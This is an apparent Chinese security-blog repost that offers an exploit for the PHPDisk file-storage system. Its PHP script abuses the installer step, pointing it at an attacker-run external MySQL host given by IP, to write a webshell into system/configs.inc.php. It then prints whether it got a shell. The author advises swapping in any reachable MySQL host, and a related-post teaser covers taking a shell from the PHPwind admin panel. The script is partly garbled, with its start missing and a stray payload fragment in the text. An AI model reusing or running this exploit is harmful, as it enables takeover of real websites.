phpdisk header bypass & getShell exp

admin 2021年4月3日19:35:09评论42 views字数 151阅读0分30秒阅读模式

PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的东东…..

文章是上个星期写的  文中的 98.126.4.252  已然失效   临时改为  98.126.4.251

如果还不行 请大家去找 能外链的 mysql    改密码为

',);?>

phpdisk 漏洞发布 -- phpdisk header bypass & getShell exp

';
$data="step=5&dbhost=98.126.4.251&dbuser=root&dbname=mysql&dbpasswd=".$pass;

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$result=curl_exec($ch);
curl_close($ch);

$shell="http://".$site.'/system/configs.inc.php';

if(strpos(@file_get_contents($shell),'pconnect')){
    echo  "Hi  guy  I  get the  Shell:".$shell;
}else{
    echo   "Shit !!!   This   Site:$site  Can  not   get  Shell";
}
?>

具体代码审计文章 +exp   还是附件的干活:Phpdisk  header bypass  & getShell  exp

代码审计文章(非附件、在线版):phpdisk header bypass & getShell exp.doc

文章来源于lcx.cc:phpdisk header bypass & getShell exp

相关推荐: 【转载】PHPwind 7.5 sp3 后台拿shell

作者:meao 出自:www.secmao.tk 常规设置:站点地址和管理员邮箱处插入代码 站点地址:http://''''''''''''''''''''''''''''''''''' 管理员邮箱:''''''''''''''''''''''''''''''…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:35:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpdisk header bypass & getShell exphttps://cn-sec.com/archives/323719.html

发表评论

匿名网友 填写信息